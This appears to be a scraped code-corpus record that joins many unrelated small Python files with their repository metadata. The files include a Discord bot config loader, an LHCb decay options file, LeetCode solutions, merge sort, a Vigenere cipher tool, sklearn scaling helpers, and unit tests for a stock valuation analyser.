with open(CONFIG_PATH) as f:
return json.load(f)
if not os.path.exists(CONFIG_PATH):
write_config(default_config)
print("No config detected; a new one has been written! Please edit config.json then run the bot again.")
sys.exit(1)
config = read_config()
client.add_cog(ModmailBot(client, config))
client.run(Discord_Token)
| [
"noreply@github.com"
] | noreply@github.com |
ee4a8bd968583926c1ed2877ab805846d1966635 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/16144140.py | a395cacae7ac1620e027f02c873102b4b6342cf3 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/16144140.py generated: Wed, 25 Jan 2017 15:25:29
#
# Event Type: 16144140
#
# ASCII decay Descriptor: [Xi_b0 -> (Lambda0 -> p+ pi-) (J/psi(1S) -> mu+ mu-)]cc
#
from Configurables import Generation
Generation().EventType = 16144140
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Xib0_JpsiLambda,mm=phsp,DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 5232,-5232 ]
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
dd399425d76c8de76f3f47e0e593e205cbf01591 | 9d4f68edfe2b68689f27fbf8d4601b5e759c9b07 | /new/algorithm11-maximum-69-number.py | daa8f0a4280549a816b92cf705a10f4430ec8412 | [] | no_license | javerthu/demo | 8cb9a7eadadde70c3117b2d598f47d4b977450d7 | 06335132e75c4df4ee2be535e255d9bc762e0087 | refs/heads/master | 2020-08-15T01:23:38.717143 | 2020-04-02T15:36:19 | 2020-04-02T15:36:19 | 215,259,562 | 2 | 0 | null | 2019-10-15T15:31:25 | 2019-10-15T09:29:38 | Python | UTF-8 | Python | false | false | 1,285 | py | '''
给你一个仅由数字 6 和 9 组成的正整数 num。
你最多只能翻转一位数字,将 6 变成 9,或者把 9 变成 6 。
请返回你可以得到的最大数字。
示例 1:
输入:num = 9669
输出:9969
解释:
改变第一位数字可以得到 6669 。
改变第二位数字可以得到 9969 。
改变第三位数字可以得到 9699 。
改变第四位数字可以得到 9666 。
其中最大的数字是 9969 。
示例 2:
输入:num = 9996
输出:9999
解释:将最后一位从 6 变到 9,其结果 9999 是最大的数。
示例 3:
输入:num = 9999
输出:9999
解释:无需改变就已经是最大的数字了。
提示:
1 <= num <= 10^4
num 每一位上的数字都是 6 或者 9 。
'''
num = eval(input('输入整数:'))
d = str(num)
if '6' not in d:
print(num)
else:
c = -1
for i in d:
c = c + 1
if int(i) == 6:
print(int(d[0:c] + '9' + d[c+1::]))
break
#letcode模板
# class Solution:
# def maximum69Number (self, num: int) -> int:
# d = str(num)
# if '6' not in d:
# return num
# c = -1
# for i in d:
# c = c + 1
# if int(i) == 6:
# return int(d[0:c] + '9' + d[c+1::]) | [
"867216905@qq.com"
] | 867216905@qq.com |
bea0b9d9c683356da4d5387f4f595bbf7741ff45 | 9f8c8dd70c4c5897cc48a57e04c47c607bce2fc4 | /break.py | ff69b6f8447c87474764f9a50f58cd5db40799a5 | [] | no_license | maghelu98/corso-udemy | 403ce1fc54463a756850b724c94803fc10becd0e | e7cee0bbe4a175e835aad8ca4811025e746ea580 | refs/heads/master | 2022-12-09T07:25:52.710290 | 2020-05-03T20:57:30 | 2020-05-03T20:57:30 | 137,659,935 | 0 | 0 | null | 2022-12-08T09:46:46 | 2018-06-17T14:11:47 | Python | UTF-8 | Python | false | false | 500 | py | delta = input("delta: ")
try:
for i in range(1,20):
try:
print("i = %d ..." % (i))
j = 1.0/(delta+10.0-i)
print("i =%d , j = %f " % (i,j))
except Exception as e:
print("prima di raise: {}, per i = {:d}".format(e, i))
raise
print("dopo di raise: {}, per i = {:d}".format(e,i))
break
print("programma completato")
except Exception as e:
print("programma in errore: {}".format(e))
raise
| [
"giovanni.pelosi@unimib.it"
] | giovanni.pelosi@unimib.it |
21e5ec7379ce378487962e49e3194e013cbf8211 | a7809b4619c6fd557c654d05a76498888e539e08 | /init_instance.py | e1e41e4e99a067976ea573f0c1ee2e45a16a921c | [] | no_license | kokubum/Data-Model | e6e2f2ba298c047040220a17bdc2034e182e4ccf | d4b4f5bdc9fb139526faffbc4b21af90f632aff6 | refs/heads/master | 2022-07-17T01:29:01.201970 | 2020-05-15T18:10:29 | 2020-05-15T18:10:29 | 264,260,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 850 | py | class Test:
#The __new__ method is called by the Test.__class__.__call__(Test,*args,**kwargs)
def __new__(cls,*args,**kwargs):
print("Creating instance!")
#__new__ is responsible for creating the instance of the class Test wich will be used in __init__ constructor
#Starting from python 3.3+ we can't pass any extra arguments to the object if we are overriden the __init__ and __new__ method
instance = super().__new__(cls)
return instance
def __init__(self,num1,num2):
print("Initializing the attributes!")
self.sum = num1+num2
if __name__ == '__main__':
test = Test(10,15)
print("Sum Attribute: %d " %test.sum)
print('-------------------------------------------')
test2 = Test.__class__.__call__(Test,10,10)
print("Sum Attribute: %d " %test2.sum)
| [
"eskokubum@gmail.com"
] | eskokubum@gmail.com |
2bab2de433e731e2c1376160a0148c2a824ea777 | 46083e01408b6bb2e05f78a38f69fd5a6881a4c3 | /autotesting/test2/testcase/testbase.py | 1611bc6797907d0c433ece866a2067286b297c17 | [] | no_license | caixinshu/api | 7601ce97ed6666cbc5995ecd1e32165605a7da7e | b75bf1bdbf4ee14f0485d552ff2f382c7991821e | refs/heads/master | 2021-01-22T05:54:14.651098 | 2019-12-17T09:09:23 | 2019-12-17T09:19:26 | 81,718,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # -*- coding: utf-8 -*
import requests
from suds.client import Client
from config import url
from tools import readexceldata
#初始化url
class test:
def __init__(self,url,file,colnameindex,by_name):
self.url=url
self.file=file
self.colnameindex=colnameindex
self.by_name=by_name
def getclient(self):#生成客户端
client=Client(self.url)
return client
def getdata(self):#获得excel表单数据
data=readexceldata.excel_table_byname(self.file,self.colnameindex,self.by_name)
return data
def main():
test1=test(url.loginurl,"E:\\workspacepython\\apiteststudy\\data\\study.xls",0,"login")
print "111"
print test1.getdata()
if __name__=="__main__":
main()
| [
"651696408@qq.com"
] | 651696408@qq.com |
57d10fbb4204045209819083196a47597d5fb8d6 | ff580bee72f5c215b6b1d22315124db5a20696aa | /merge_sort.py | c27ea2aaf7ed9e439c86ffd8bad1dfbdb459ed94 | [] | no_license | raghavpatnecha/Fun_with_python | e10bcd7e824665cc1a83251602bae3682ced5c3f | 59165d166ced8e4d17307ec502972b13b362b8e2 | refs/heads/master | 2021-05-03T04:29:51.540465 | 2018-06-10T09:18:39 | 2018-06-10T09:18:39 | 120,617,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 822 | py | def mergesort(mylist):
if len(mylist) >1:
mid = len(mylist)//2
lefthalf= mylist[:mid]
righthalf = mylist[mid:]
mergesort(lefthalf)
mergesort(righthalf)
i=0
j=0
k=0
while i < len(lefthalf) and j < len(righthalf):
if lefthalf[i] < righthalf[j]:
mylist[k] = lefthalf[i]
i += 1
else:
mylist[k]= righthalf[j]
j = j+1
k = k+1
while i < len(lefthalf):
mylist[k]= lefthalf[i]
i=i+1
k = k+1
while j < len(righthalf):
mylist[k] =righthalf[j]
j = j+1
k=k+1
mylist= [54,26,93,17,77,31,44,55,20]
mergesort(mylist)
print(mylist)
| [
"noreply@github.com"
] | noreply@github.com |
1d691134309a3252a7bb156b88d6ee3a5209797e | 39e75353e5539dfbaeb64d6437ceace2d2e02d2d | /VigenereCipher.py | 9b2b56b48b492453f36447a17153b58b26442bde | [] | no_license | the-bumblebee/vigenere-cipher | 900411733292169859a735ef37a8cdf97c71b1b3 | d0e370320a203fa8136e4080fe496431a0ab7b1a | refs/heads/master | 2020-04-23T11:42:24.609381 | 2019-02-21T16:47:32 | 2019-02-21T16:47:32 | 165,599,161 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,118 | py | import argparse
alph = list(map(chr, range(97, 123)))
def encrypt(message, key):
message = message.lower()
key = key.lower()
cipherText = ''
nonCount = 0
for i in range(len(message)):
if message[i] not in alph:
nonCount += 1
cipherText += message[i]
else:
cipherText += alph[(alph.index(key[(i - nonCount) % len(key)]) + alph.index(message[i]) ) % 26]
return cipherText
def decrypt(cipherText, key):
cipherText = cipherText.lower()
key = key.lower()
message = ''
nonCount = 0
for i in range(len(cipherText)):
if cipherText[i] not in alph:
nonCount += 1
message += cipherText[i]
else:
message += alph[(alph.index(cipherText[i]) - alph.index(key[(i - nonCount) % len(key)])) % 26]
return message
def main():
if args.encrypt_flag == None and args.message == None and args.key == None:
sel = input('Encrypt(1) or decrypt(2):')
if sel == '1':
message = input('Enter text to be encrypted:')
key = input('Enter key:')
print('Encrypted message:\n' + encrypt(message, key))
elif sel == '2':
message = input('Enter text to be decrypted:')
key = input('Enter key:')
print('Decrypted message:\n' + decrypt(message, key))
elif args.encrypt_flag == True and args.message != None and args.key != None:
message = args.message
key = args.key
print('Encrypted message:\n' + encrypt(message, key))
elif args.encrypt_flag == False and args.message != None and args.key != None:
message = args.message
key = args.key
print('Decrypted message:\n' + decrypt(message, key))
else:
parser.print_help()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
group.add_argument('-d', action = 'store_false', dest = 'encrypt_flag', default = None, help = 'decrypt message')
group.add_argument('-e', action='store_true', dest = 'encrypt_flag', help = 'encrypt message')
parser.add_argument('-m', '--message', help = 'message to be encrypted or decrypted')
parser.add_argument('-k', '--key', help = 'key used for encryption or decryption')
args = parser.parse_args()
main()
| [
"klmktu.asif@gmail.com"
] | klmktu.asif@gmail.com |
f0cc895a2f838da497f08e2940e7412d4b7b2cef | 77e1db762bd012e0447b8275df6e24012a3aa82f | /gas-station/gas-station.py | 2f97eebf9959f4a7592e2c8b22af1118397bc4c1 | [] | no_license | PigsGoMoo/LeetCode | 1e9d37507b04a238347bcc693e9be3d24313a46e | a5c9bc433ac6c54bebb83b9640273216512f41b8 | refs/heads/main | 2023-06-28T12:58:57.516464 | 2021-08-03T19:49:07 | 2021-08-03T19:49:07 | 362,915,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,426 | py | class Solution:
def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:
# [2, 2, 2, -3, -3]
# [1, 1, -1]
# DP solution? Make an array of differences between cost - gas for each index
# If that array sum is <= 0, then it's possible. If >= 1, then we cannot.
# Start would be at first negative index?
# [2, 2, -3, 2, -3] would start at 2?
# [1, 2, 3, 4, 5] - gas
# [3, 4, 0, 6, 2] - cost
# dp = [c - g for c, g in zip(cost, gas)]
dp = []
tot = 0
for idx, (c, g) in enumerate(zip(cost, gas)):
val = c - g
dp.append(val)
tot += val
# print(dp, tot, first)
if tot > 0:
return -1
else:
# [-1, 3, -1, 2, -3]
# Keep sum. If > 0, reset. Keep track of first neg
# If hit end of array and sum <= 0, return first neg
valid = 0
reset = True
last_neg = 0
for idx, num in enumerate(dp):
if num < 0 and reset:
valid += num
reset = False
last_neg = idx
else:
valid += num
if valid > 0:
reset = True
valid = 0
return last_neg
| [
"33019839+PigsGoMoo@users.noreply.github.com"
] | 33019839+PigsGoMoo@users.noreply.github.com |
e774d1201c6a3930755f808039578edf9f6144e7 | a6d7b74046a0da8bbae2cda7d4d34deabc581445 | /Game_Server/node_modules/uws/build/config.gypi | 87ebd561d683cb97597cc7b1aafabdd9024087b1 | [
"Zlib"
] | permissive | tztz8/TSA_Game | 9b3ab36bb7018553689565157880a816dd744d79 | baaba65abb18f6c21b7df1864f970ab428c768d3 | refs/heads/master | 2021-05-09T19:05:20.688409 | 2020-04-15T18:51:52 | 2020-04-15T18:51:52 | 118,629,385 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,409 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt58l.dat",
"icu_data_in": "..\\..\\deps/icu-small\\source/data/in\\icudt58l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "58",
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 48,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "false",
"node_use_etw": "true",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "true",
"node_use_v8_platform": "true",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "so.48",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_inspector": "true",
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"nodedir": "C:\\Users\\Timbre Freeman\\.node-gyp\\6.11.4",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"access": "",
"also": "",
"always_auth": "",
"bin_links": "true",
"browser": "",
"ca": "",
"cache": "C:\\Users\\Timbre Freeman\\AppData\\Roaming\\npm-cache",
"cache_lock_retries": "10",
"cache_lock_stale": "60000",
"cache_lock_wait": "10000",
"cache_max": "Infinity",
"cache_min": "10",
"cert": "",
"color": "true",
"depth": "Infinity",
"description": "true",
"dev": "",
"dry_run": "",
"editor": "notepad.exe",
"engine_strict": "",
"fetch_retries": "2",
"fetch_retry_factor": "10",
"fetch_retry_maxtimeout": "60000",
"fetch_retry_mintimeout": "10000",
"force": "",
"git": "git",
"git_tag_version": "true",
"global": "",
"globalconfig": "C:\\Users\\Timbre Freeman\\AppData\\Roaming\\npm\\etc\\npmrc",
"globalignorefile": "C:\\Users\\Timbre Freeman\\AppData\\Roaming\\npm\\etc\\npmignore",
"global_style": "",
"group": "",
"heading": "npm",
"https_proxy": "",
"if_present": "",
"ignore_scripts": "",
"init_author_email": "",
"init_author_name": "",
"init_author_url": "",
"init_license": "ISC",
"init_module": "C:\\Users\\Timbre Freeman\\.npm-init.js",
"init_version": "1.0.0",
"json": "",
"key": "",
"legacy_bundling": "",
"link": "",
"local_address": "",
"long": "",
"maxsockets": "50",
"message": "%s",
"node_version": "6.11.4",
"npat": "",
"onload_script": "",
"only": "",
"optional": "true",
"parseable": "",
"prefix": "C:\\Users\\Timbre Freeman\\AppData\\Roaming\\npm",
"production": "",
"progress": "true",
"proprietary_attribs": "true",
"rebuild_bundle": "true",
"registry": "https://registry.npmjs.org/",
"rollback": "true",
"save": "true",
"save_bundle": "",
"save_dev": "",
"save_exact": "",
"save_optional": "",
"save_prefix": "^",
"scope": "",
"searchexclude": "",
"searchopts": "",
"searchsort": "name",
"shell": "C:\\WINDOWS\\system32\\cmd.exe",
"shrinkwrap": "true",
"sign_git_tag": "",
"strict_ssl": "true",
"tag": "latest",
"tag_version_prefix": "v",
"tmp": "C:\\Users\\TIMBRE~1\\AppData\\Local\\Temp",
"umask": "0000",
"unicode": "",
"unsafe_perm": "true",
"usage": "",
"user": "",
"userconfig": "C:\\Users\\Timbre Freeman\\.npmrc",
"user_agent": "npm/3.10.10 node/v6.11.4 win32 x64",
"version": "",
"versions": "",
"viewer": "browser"
}
}
| [
"180427@cvsd356.org"
] | 180427@cvsd356.org |
433192fa2881cfd43a42000926be587693feb71b | 45b52a8019e9cd05b82e7a8393ef15a96bc9a2f3 | /src/ml/scale.py | 340adb1256d031d57c8420826a45a83e30d5ca38 | [] | no_license | adpartin/pdx-histo | be57fb9171b23fb0146d6e06caa5a7b442800698 | 52a6468034c1966e2d85024d863817804dcb387a | refs/heads/main | 2023-06-27T00:56:24.875604 | 2021-07-15T21:48:29 | 2021-07-15T21:48:29 | 317,675,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,683 | py | import sklearn
import numpy as np
import pandas as pd
# from sklearn.metrics import confusion_matrix
# from sklearn.metrics import ConfusionMatrixDisplay
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler
# from sklearn.externals import joblib
# from math import sqrt
def scale_fea(xdata, scaler_name='stnd', dtype=np.float32, verbose=False):
""" Returns the scaled dataframe of features. """
if scaler_name is None:
if verbose:
print('Scaler is None (not scaling).')
return xdata
if scaler_name == 'stnd':
scaler = StandardScaler()
elif scaler_name == 'minmax':
scaler = MinMaxScaler()
elif scaler_name == 'rbst':
scaler = RobustScaler()
else:
print(f'The specified scaler {scaler_name} is not supported (not scaling).')
return xdata
cols = xdata.columns
return pd.DataFrame(scaler.fit_transform(xdata), columns=cols, dtype=dtype)
def get_scaler(fea_df, scaler_name: str="standard", print_fn=print):
""" Returns a sklearn scaler object. """
fea_df = fea_df.drop_duplicates().reset_index(drop=True)
if fea_df.shape[0] == 0:
# TODO: add warning!
return None
if scaler_name == "standard":
scaler = sklearn.preprocessing.StandardScaler()
elif scaler_name == "minmax":
scaler = sklearn.preprocessing.MinMaxScaler()
elif scaler_name == "robust":
scaler = sklearn.preprocessing.RobustScaler()
else:
print_fn(f"The specified scaler {scaler_name} is not supported (not scaling).")
return None
# scaler = StandardScaler()
scaler.fit(fea_df)
return scaler
| [
"25892264+adpartin@users.noreply.github.com"
] | 25892264+adpartin@users.noreply.github.com |
cc8da95fe71004d8514e3893a382112d58a95551 | ed2b2929b028f7b53f38ae72ad58d2af407c9c72 | /venv/Scripts/easy_install-script.py | bd6eda98cad82b59c89f3db92439ff31f06e7336 | [] | no_license | LiuzJY/Locust | 6a34dd089a70cceb3bc1b46e04ec02faf60cb6bf | 2ca251445fa16328eb6ff258577b5781a3547a37 | refs/heads/master | 2022-11-13T01:19:55.112076 | 2020-07-10T09:41:34 | 2020-07-10T09:41:34 | 262,478,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | #!"D:\PyCharm 2018.3.1\Workpace\locust\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
| [
"2212627962@qq.com"
] | 2212627962@qq.com |
93ff2aca5849d1c9ab4f4890838447bd1918b640 | 50bb1636ce4cd745ca275c32948bc74b089127bb | /project_one/src/item/__init__.py | d22f598ff891034bd075310c9dd502c89380bdee | [] | no_license | silaslxy/sunshine | 82cc08bb3d264a39f56762998e0a9af677516e99 | 1252be429da5dfd6ad26330924ccb8407c60a52d | refs/heads/master | 2023-04-22T05:03:50.361022 | 2020-07-09T06:31:31 | 2020-07-09T06:31:31 | 277,517,964 | 0 | 0 | null | 2021-05-13T20:58:03 | 2020-07-06T10:59:44 | Python | UTF-8 | Python | false | false | 184 | py | # coding: utf-8
# ----------------------------------
# @Author: xiaosiwen
# @Date: 2020/7/6 16:44
# @Desc:
# ----------------------------------
from item.views import bp as model_a_bp
| [
"xsw@lianantech.com"
] | xsw@lianantech.com |
8153a3ae78cbde795f5f302dc726b7210de73588 | 64a5b1d69e328abb217ef2b007ab8ed6fb8d3692 | /tests/testEPVanalyser.py | 146b4f8513e2480f173afc1b24e082493031a512 | [] | no_license | markhocky/Investing | 5e5c31a34d66be65d8251475ab790451a7a6c53a | c37a048634fafaf46b9f096a906e92c9005f6164 | refs/heads/master | 2020-04-04T10:40:49.087228 | 2018-05-28T02:22:35 | 2018-05-28T02:22:35 | 55,501,355 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 24,401 | py | import unittest
import pandas
import math
import numpy as np
from sklearn.linear_model import LinearRegression
from mock import Mock, call
from StockAnalysis.Analysers import EPVanalyser, FinanceAnalyst
class Test_EstimateIncomeAndExpenses(unittest.TestCase):
def setUp(self):
years = ["2015", "2014", "2013", "2012", "2011"]
self.income = Mock()
self.balance = Mock()
self.cash = Mock()
self.zero_series = pandas.Series([0.0] * len(years), index = years)
self.income.sales = pandas.Series([216892.6, 114182.9, 114695.4, 152837.9, 142511.6], index = years)
self.income.DandA = pandas.Series([4169.4, 1639.2, 974.8, 685.7, 542.4], index = years)
self.income.depreciation = pandas.Series([2169.4, 1200.2, 800.8, 650.7, 500.4], index = years)
self.income.amortization = self.income.DandA - self.income.depreciation
interest_earned = pandas.Series([1117.3, 1264.7, 1491.0, 2191.8, 955.8], index = years)
interest_expense = pandas.Series([58.9, 81.0, 104.0, 88.1, 44.0], index = years)
self.income.net_interest = interest_earned - interest_expense
self.income.pretax = pandas.Series([17195.9, 16786.6, 11476.0, 19858.1, 29247.5], index = years)
self.income.unusual_expense = pandas.Series([0.0, 0.0, 0.0, 1000.0, 0.0], index = years)
self.income.non_operating_income = pandas.Series([4000.0, 17000.0, 4000.0, 18000.0, 0.0], index = years)
self.balance.assets = pandas.Series([102972.0, 81903.0, 63604.2, 64117.2, 68824.9], index = years)
self.balance.PPE = pandas.Series([3514.6, 2040.9, 2672.0, 2191.9, 1972.6], index = years)
self.balance.intangibles = pandas.Series([552.7, 3647.7, 0.0, 0.0, 0.0], index = years)
self.balance.other_intangibles = pandas.Series([52.70, 3595.0, 0.0, 0.0, 0.0], index = years)
self.balance.cash = pandas.Series([64583.0, 33542.3, 16218.7, 33861.2, 36014.1], index = years)
self.balance.debt = pandas.Series([1104.3, 535.4, 908.3, 479.0, 928.5], index = years)
self.cash.capex_assets = pandas.Series([1797.3, 43.9, 724.1, 908.3, 1081.1], index = years)
self.cash.capex_other = pandas.Series([102.0, 3000.0, 0.0, 0.0, 0.0], index = years)
self.cash.asset_sales = pandas.Series([0.0, 20.0, 0.0, 0.0, 52.0], index = years)
self.cash.debt_reduction = pandas.Series([168.0, 358.0, 301.0, 449.5, 277.0], index = years)
self.cash.change_in_working_capital = pandas.Series([1680.0, -1358.0, 301.0, 4492.5, -2277.0], index = years)
self.lease_financing = pandas.Series([737.4, -15.0, 730.7, 0.0, 0.0], index = years)
self.adjusted_earnings = pandas.Series([11150.46, 7893.12, 5666.38, 12404.10, 19816.02], index = years)
self.asset_maintenance = pandas.Series([1850.0, 1658.0, 650.0, 1100.0, 980.0], index = years)
self.financials = FinanceAnalyst(self.income, self.balance, self.cash)
def test_AvgCapitalToSales(self):
avg_capital_sales_ratio = self.financials.cap_sales_ratio()
yearly_ratios = (self.balance.PPE + self.balance.intangibles) / self.income.sales
self.assertEqual(avg_capital_sales_ratio, yearly_ratios.mean())
self.assertAlmostEqual(avg_capital_sales_ratio, 0.024, places = 3)
def test_EstimateGrowthCapexFromSales(self):
sales_change = self.income.sales.diff(periods = -1)
sales_change = sales_change.fillna(method = "pad")
cap_sales_ratio = 0.05
expected = sales_change * cap_sales_ratio
expected[expected < 0] = 0
self.financials.cap_sales_ratio = Mock(return_value = cap_sales_ratio)
actual = self.financials.growth_capex()
self.assertTrue(actual.equals(expected))
def test_ImpliedCapex(self):
capital_base_change = (self.balance.PPE + self.balance.intangibles).diff(periods = -1)
capital_base_change = capital_base_change.fillna(method = "pad")
expected = capital_base_change + self.income.DandA
actual = self.financials.implied_capex()
self.assertTrue(actual.equals(expected))
def test_ExpendedDepreciation(self):
capital_base = self.financials.capital_base()
capital_base_change = self.financials.series_diff(capital_base)
capital_base_change[capital_base_change > 0] = 0
expected = self.income.DandA + capital_base_change
actual = self.financials.expended_depreciation()
self.assertTrue(actual.equals(expected))
def test_NetAssetCashExpenditures(self):
expected = self.cash.capex_assets
actual = self.financials.asset_capex()
self.assertTrue(actual.equals(expected))
def test_LeaseFinancingCosts(self):
debt_change = self.financials.series_diff(self.financials.totalDebt())
expected = self.cash.debt_reduction + debt_change
actual = self.financials.lease_financing()
self.assertTrue(actual.equals(expected))
def test_NetPPEMaintenanceCashflows(self):
self.financials.lease_financing = Mock(return_value = self.lease_financing)
PPE_change = self.financials.PPE_change_net_sales()
net_cash_capex = self.financials.asset_capex()
expected = self.lease_financing + net_cash_capex - PPE_change
actual = self.financials.PPE_maintenance()
self.assertTrue(actual.equals(expected))
def test_PPEmaintenanceWithZeroCashflowError(self):
self.financials.asset_capex = Mock(return_value = self.zero_series)
self.financials.lease_financing = Mock(return_value = self.zero_series)
expected = self.income.depreciation
actual = self.financials.PPE_maintenance()
self.assertTrue(actual.equals(expected))
def test_IntangiblesMaintenanceCashflows(self):
intangibles_change = self.financials.series_diff(self.balance.other_intangibles)
intangibles_change[intangibles_change < 0] = 0
capex_ex_growth = self.cash.capex_other - intangibles_change
capex_ex_growth[capex_ex_growth < 0] = 0
intangibles_spend_pct = capex_ex_growth / self.balance.other_intangibles
expected = self.balance.other_intangibles * intangibles_spend_pct.mean()
actual = self.financials.intangibles_maintenance()
self.assertTrue(actual.equals(expected))
def test_IntangibleMaintenanceWithZeroCashflowError(self):
self.cash.capex_other = self.zero_series
expected = self.income.amortization
actual = self.financials.intangibles_maintenance()
self.assertTrue(actual.equals(expected))
def test_InvestedCapital(self):
net_cash = self.balance.cash - 0.015 * self.income.sales
expected = self.balance.assets - net_cash
invested_capital = self.financials.investedCapital()
self.assertTrue(invested_capital.equals(expected))
def test_NetUnusuals(self):
unusuals = self.income.unusual_expense - self.income.non_operating_income
expected = unusuals - unusuals.mean()
actual = self.financials.net_unusuals()
self.assertTrue(actual.equals(expected))
def test_NonCashExpenses(self):
expected = self.income.DandA
actual = self.financials.non_cash_expenses()
self.assertTrue(actual.equals(expected))
def test_TotalMaintenanceExpense(self):
expected = (self.financials.PPE_maintenance() +
self.financials.intangibles_maintenance() + self.financials.working_capital_requirements())
actual = self.financials.maintenance_expense()
self.assertTrue(actual.equals(expected))
def test_CalculateEBIT(self):
expected = self.income.pretax - self.income.net_interest
actual = self.financials.EBIT()
self.assertTrue(actual.equals(expected))
def test_CalculateAdjustedEarnings(self):
self.financials.asset_maintenance = Mock(return_value = self.asset_maintenance)
EBIT = self.financials.EBIT()
expected = (EBIT + self.financials.net_unusuals()) * 0.7 + self.financials.non_cash_expenses() - self.asset_maintenance
adj_earnings = self.financials.ownerEarnings()
self.assertTrue(adj_earnings.equals(expected))
class Test_EstimatesOfFinancing(unittest.TestCase):
def setUp(self):
years = ["2015", "2014", "2013", "2012", "2011"]
self.income = Mock()
self.balance = Mock()
self.cash = Mock()
self.cash.dividends_total = pandas.Series([12784.7, 9000.0, 9000.0, 12000.0, 19000.0], index = years)
self.income.num_shares_diluted = pandas.Series([153646.0, 152881.0, 151569.0, 150000.0, 125932.0], index = years)
self.adjusted_earnings = pandas.Series([11150.46, 7893.12, 5666.38, 12404.10, 19816.02], index = years)
self.invested_capital = pandas.Series([130000.0, 120000, 67000.0, 124000, 195000.0], index = years)
self.financials = FinanceAnalyst(self.income, self.balance, self.cash)
self.financials.ownerEarnings = Mock(return_value = self.adjusted_earnings)
self.financials.investedCapital = Mock(return_value = self.invested_capital)
def test_DividendRate(self):
expected = self.adjusted_earnings / self.cash.dividends_total
div_rate = self.financials.dividend_rate()
self.assertTrue(div_rate.equals(expected))
def test_CapitalInvestmentPercentage(self):
expected = (self.adjusted_earnings - self.cash.dividends_total) / self.invested_capital
invest_pct = self.financials.capitalInvestmentPct()
self.assertTrue(invest_pct.equals(expected))
def test_DilutionGrowth(self):
shares_growth = self.income.num_shares_diluted.pct_change(periods = -1)
dilution_growth = self.financials.dilutionGrowth()
self.assertEqual(dilution_growth, shares_growth.mean())
self.assertAlmostEqual(dilution_growth, 0.0538, places = 4)
class Test_CalculateWACC(unittest.TestCase):
def setUp(self):
years = ["2015", "2014", "2013", "2012", "2011"]
self.income = Mock()
self.balance = Mock()
self.cash = Mock()
self.financial_analyst = FinanceAnalyst(self.income, self.balance, self.cash)
self.adjusted_earnings = pandas.Series([13863.84, 11931.48, 6634.01, 12389.30, 19480.11], index = years)
self.invested_capital = pandas.Series([130000.0, 120000, 67000.0, 124000, 195000.0], index = years)
self.assets = pandas.Series([102972.0, 81903.0, 63604.2, 64117.2, 68824.9], index = years)
self.debt = pandas.Series([1104.3, 535.4, 908.3, 479.0, 928.5], index = years)
self.free_cash = pandas.Series([140.3, 52.2, 85.3, 44.0, 28.5], index = years)
self.financial_analyst.ownerEarnings = Mock(return_value = self.adjusted_earnings)
self.financial_analyst.investedCapital = Mock(return_value = self.invested_capital)
self.financial_analyst.totalAssets = Mock(return_value = self.assets)
self.financial_analyst.totalDebt = Mock(return_value = self.debt)
self.financial_analyst.netCash = Mock(return_value = self.free_cash)
